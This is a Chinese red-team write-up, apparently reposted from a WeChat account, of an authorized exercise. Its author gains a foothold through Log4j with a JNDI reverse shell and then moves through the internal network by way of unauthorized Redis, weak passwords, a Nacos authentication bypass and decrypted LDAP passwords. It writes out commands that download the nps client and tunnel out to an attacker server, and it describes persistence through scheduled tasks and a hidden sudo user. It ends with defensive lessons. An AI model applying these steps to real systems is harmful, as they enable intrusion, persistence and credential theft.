【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

admin 2022年9月29日14:41:27评论71 views字数 4505阅读15分1秒阅读模式
作者:u21h2  
原文地址:https://xz.aliyun.com/t/11524
平台:先知社区

目录

概述信息收集Log4j进入内网内网横向  第一阶段  第二阶段  被发现  再打个口子  继续横向  又掉了  LDAP  爆破结果思考

概述

依旧是某省HVV红队的经历。

过程中只用到很简单的方法,所以加了个标题“有手就行”。

这家企业在内网犯了几乎所有能犯的错误,打起来也比较顺利,只不过当时被管理员发现了,争分夺秒的过程也比较有趣哈哈。

文中内容已做脱敏处理,渗透过程已获得授权, 相关漏洞也已经修复。

所介绍方法请勿用于非法用途!

信息收集

先摸一下这个公司的资产,就用example.com代替域名好了。

发现技术栈比较新,大部分都是前后端分离的,后端的接口有一个统一的网关,梳理下。

列举部分:

前端:https://op.example.com/login 手机或账号登录 可找回密码 没找到
接口:https://webapi.example.com:20860/gateway-dev/usercenter/

前端:http://chm.example.com/login
接口:http://webapi.example.com:20860/chm/

前端:https://oa.example.com/auth/login 爆不出来
接口:http://api.example.com:20242/gateway/organization-center/

前端:https://test.example.com/auth/login 跟oa的界面很像
接口:http://api.example.com:20242/gateway-test/organization-center/

前端:http://cms.example.com/login 失效了
接口:https://api.example.com:20242/authTest/login

前端:https://vm.example.com/login
接口:https://api.example.com:21915/login

Log4j进入内网

其他曲折的打点就不提了,说下成功的。

发现 https://oa.example.com/ 的登录接口存在Log4j漏洞,使用https://github.com/WhiteHSBG/JNDIExploit 的反序列化方法直接反弹shell。
主机上没有EDR,出网(废话),是10段的普通用户。

进来先写个计划任务保证断了之后shell还能弹。

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

内网横向

第一阶段

内网横向肯定得fscan出场了,这里也推荐下我写的缝合怪,求Star! https://github.com/u21h2/nacs (能扫常见组件和字段的Log4j)。

一般刚开始就扫个C段就行了,好巧不巧,发现了我最喜欢的Redis未授权,进去发现还是root用户,但是不出网。

这种情况我一般会创建一个sudo免密的新用户,就adduser然后visudo就可以了,用户名字起地别太假。

然后在出网的机器用nps搭一个隧道出来,服务端提前配好,客户端就三句话的事。

wget https://github.com//ehang-io/nps/releases/download/v0.26.10/linux_amd64_client.tar.gz
tar -zxvf linux_amd64_client.tar.gz
nohup ./npc -server=xxx.xxx.xxx.xxx:xxx -vkey=xxx > npc.log 2>&1 &

然后在本地proxifier走这个socks代理,ssh我们创建的用户,这样体验就好一些,反弹shell太难用了。

第二阶段

然后继续内网扫描,首先用扫描器的icmp模块看看内网有多大,然后再扫。

内网不大,就两个C段资产比较多。

我一般习惯先拿非web资产,最后再看web资产。

首先把所有的redis未授权和弱口令都利用了,一共拿到大约12台机器,然后进去翻web服务的配置文件,把数据库密码找到,发现几个经常用的强口令,补充到扫描器里接着爆扫数据库和服务器。

被发现

搞到一半突然发现代理断了,shell也弹不过来了,看了下入口的oa界面,后面的接口直接不通了,应该是oa后端对应的服务器直接关机了。难道是检测到出网流量了?

这不完犊子了吗。

再打个口子

回过头看上边信息收集的资产,test.example.com的界面跟oa很像,而且后端的接口也很像,会不会...?

果然,也有Log4j漏洞,也是普通用户,是另一台机器。

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

看了下我刚开始redis的跳板还没掉,应该就是出网流量被检测到了。

是HVV最后一天了,资产也不多,不管那么多了。
多找些机器开socks代理接着打。

继续横向

接着来看web服务,发现有很多nacos的服务,都有身份绕过的洞,进去又找到一堆数据库和AK的配置,接着补充到漏扫进行爆破。

还发现了许多生产系统都是弱口令,除了默认口令就是123456和admin123。

比如

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇


还有Flink、Sentinel等等。

又掉了

ssh上去的redis机器又没了,但是代理还有通的,换一台机器接着用就是了。

LDAP

在内网又发现一个LDAP服务的管理端,管控着jira、jenkins等服务。

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

这玩意应该有一个接口能直接跳转登录吧?

可惜我不会,但好在了里面写了能解密的密码,我们可以手动登相关系统。

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

解密后登录堡垒机

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

几十台机器都能连

Jira 可以看到开发过程以及代码

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

爆破结果

根据之前补充的密码,又爆破到不少新的数据库和服务器,基本两个C段的资产都拿到了吧,算作打穿了。

还拿到一些AK,能连上OSS看数据,危险啊。

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

思考

我边打,管理员边关机,还是挺有趣的哈哈。

1.攻:因为是最后一天了,急着刷分交报告,就没有做太多隐藏的手段,导致被管理员发现好多次,不太优雅。

2.防:既然能发现我,说明是有安全设备的,但应该只开了告警,没开阻断模式;只能等管理员上线手动处理,从防守上就被动了。

3.防:这个公司内网犯了挺多错的:密码复用、弱口令、漏洞不修、不隔离、服务器出网。

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

 【Hacking黑白红】,一线渗透攻防实战交流公众号

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

回复“电子书”获取web渗透、CTF电子书:

回复“视频教程”获取渗透测试视频教程;  

回复“内网书籍”获取内网学习书籍;        

回复“CTF工具”获取渗透、CTF全套工具;

回复“内网渗透;获取内网渗透资料;

回复护网;获取护网学习资料 ;

回复python,获取python视频教程;

回复java,获取Java视频教程;

回复go,获取go视频教程


知识星球


【Hacking藏经阁】知识星球致力于分享技术认知

1、技术方面。主攻渗透测试(web和内网)、CTF比赛、逆向、护网行动等;

400G渗透教学视频、80多本安全类电子书、50个渗透靶场(资料主要来自本人总结、以及学习过程中购买的课程)

2、认知方面。副业经营、人设IP打造,具体点公众号运营、抖*yin等自媒体运营(目前主要在运营两个平台4个号)。


如果你也想像我一样,不想35岁以后被动的去面试,那么加入星球我们一起成长。




【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇


欢迎加入99米/年,平均每天2毛7分钱,学习网络安全一整年。


【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇




渗透实战系列


渗透实战系列】|48-实战某高校的一次挖矿病毒的应急处置

【渗透实战系列】|47-一次内网渗透

【渗透实战系列】|46-渗透测试:从Web到内网

【渗透实战系列】|45-记一次渗透实战-代码审计到getshell

【渗透实战系列】|44-记一次授权渗透实战(过程曲折,Java getshell)

【渗透实战系列】|43-某次通用型漏洞挖掘思路分享

【渗透实战系列】|42-防范诈骗,记一次帮助粉丝渗透黑入某盘诈骗的实战

【渗透实战系列】|41-记一次色*情app渗透测试

【渗透实战系列】|40-APP渗透测试步骤(环境、代理、抓包挖洞)

▶【渗透实战系列】|39-BC渗透的常见切入点(总结)

【渗透实战系列】|38-对某色情直播渗透

【渗透实战系列】|37-6年级小学生把学校的网站给搞了!

【渗透实战系列】|36-一次bc推广渗透实战

【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透

【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链

【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP

【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站

【渗透实战系列】|31-记一次对学校的渗透测试

【渗透实战系列】|30-从SQL注入渗透内网(渗透的本质就是信息搜集)

【渗透实战系列】|29-实战|对某勒索APP的Getshell

【渗透实战系列】|28-我是如何拿下BC站的服务器

【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试(成功获取管理员真实IP)

【渗透实战系列】|26一记某cms审计过程(步骤详细)

【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程

【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法

【渗透实战系列】|23-某菠菜网站渗透实战

【渗透实战系列】|22-渗透系列之打击彩票站

【渗透实战系列】|21一次理财杀猪盘渗透测试案例

【渗透实战系列】|20-渗透直播网站

【渗透实战系列】|19-杀猪盘渗透测试

【渗透实战系列】|18-手动拿学校站点 得到上万人的信息(漏洞已提交)

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

【渗透实战系列】|16-裸聊APP渗透测试

【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点

【渗透实战系列】|14-对诈骗(杀猪盘)网站的渗透测试

【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

【渗透实战系列】|9-对境外网站开展的一次web渗透测试(非常详细,适合打战练手)

【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

【渗透实战系列】|6- BC杀猪盘渗透一条龙

【渗透实战系列】|5-记一次内衣网站渗透测试

【渗透实战系列】|4-看我如何拿下BC站的服务器

【渗透实战系列】|3-一次简单的渗透

【渗透实战系列】|2-记一次后门爆破到提权实战案例

【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

    

长按-识别-关注

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

Hacking黑白红

一个专注信息安全技术的学习平台

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

点分享

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

点收藏

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

点点赞

【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

点在看

原文始发于微信公众号(Hacking黑白红):【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月29日14:41:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透实战系列】49|- Log4j打点后与管理员斗智斗勇http://cn-sec.com/archives/1323742.html

发表评论

匿名网友 填写信息